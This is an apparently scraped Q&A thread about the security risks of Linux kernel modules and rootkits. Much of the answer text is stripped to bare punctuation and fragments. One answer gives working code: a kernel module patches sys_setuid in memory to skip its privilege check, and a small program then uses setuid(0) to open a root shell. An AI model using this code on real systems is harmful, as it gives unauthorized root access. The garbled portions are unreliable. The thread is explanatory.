Geek Answers Handbook

Linux kernel modules - security risk?

How many of the security risks are Linux kernel modules? I remember reading that it’s possible if someone got access, all they had to do was load the rootkit module. It's right? Is there a way to protect against this?

What parts of the kernel are actually displayed through the module interface and what functions do programmers have that can be used for malicious purposes?

+5
source share
6 answers

What Douglas said in full, Linux is monolithic , and the module can do anything. This is a design choice, which is mainly based on Linus Torvalds and approaches the Open Source philosophy (why limit it, it costs performance, and you can see what the module does from the source - practically speaking only about real cretins :-)-) .

Now, you may have to download some so-called binary modules from third parties. Even if they seem to be compiled, there is usually a regular object file like a black box, and only the interfaces around it are actually compiled (for example, for the nvidia graphics drivers that I use). There is no definite answer, if you download such modules, you must trust the provider, if not, do not do this ...

root , . , , ( Linux). , ( ) , root , , . - ...

, , : " , ?". , SE-Linux, , :

  • /proc /sys, , , , top, ps .. , lsmod.
  • ...
  • . ( Linux), - . , , ...
  • ...

, , Rootkit Hunter (http://www.rootkit.nl/projects/rootkit_hunter.html). , . . googling , ... , , , , . , , .

+4

- , , . , , , , , .

, root .

- , . - root , , root , , . /dev/kmem , , , , "" .

, . , ps .

, , ls.

+5

Wikipedia

, , . , . - , root , , ​​api, (, , ).

+1

, SELinux - .

root ... root... , Linux, .

- , * IX O/Ses ( , O/S) O/S, - , "" "0" / "/".

0

. , , Linux, .

:

    #include <linux/version.h>
    #include <linux/module.h>
    #include <linux/highmem.h>
    #include <asm/unistd.h> 
    char *p;   
    int init_module(void)   //0x0ffffffff8107f760 depends on system must be taken from the map                           
       {  pte_t *pte1;
          unsigned int dummy_but_needed;
          p=(char *)(0xffffffff8107f3a0 +0x4d); // Got from /boot System.map.xx.xx.xx  
          pte1 = lookup_address((unsigned long long)p, &dummy_but_needed);
          pte1->pte |= _PAGE_RW; //Now the code page is writable          
          *(p) = (char)0xeb;  //0xeb  is the code of the unconditional jmp- we don't care are we allowed to get rights. Previous was conditional jmp "75".
          return -1;  // Insmod complains and module disappears from the system but module did it work already               
       }  
    MODULE_LICENSE("GPL");//We don't need cleanup_module

, :

    int main()
      {
        setuid(0);//Or use asm("mov $0,%rdi; mov $105,%rax; syscall;");
        system("/bin/bash"); //rax=system call nr and rdi=first parameter
      }

? . sys_setuid, root! .

, . (run-time) , . ( . , , , .)

Kernel 3.2 AMD64. HW!

( :

    xxxx:/boot$ sudo grep sys_setuid System.map-3.2.0-31-generic
    [sudo] password for xxxx: 
    ffffffff8107f3a0 T sys_setuid
    ffffffff810a23f0 T sys_setuid16

)

0

More articles:


All Articles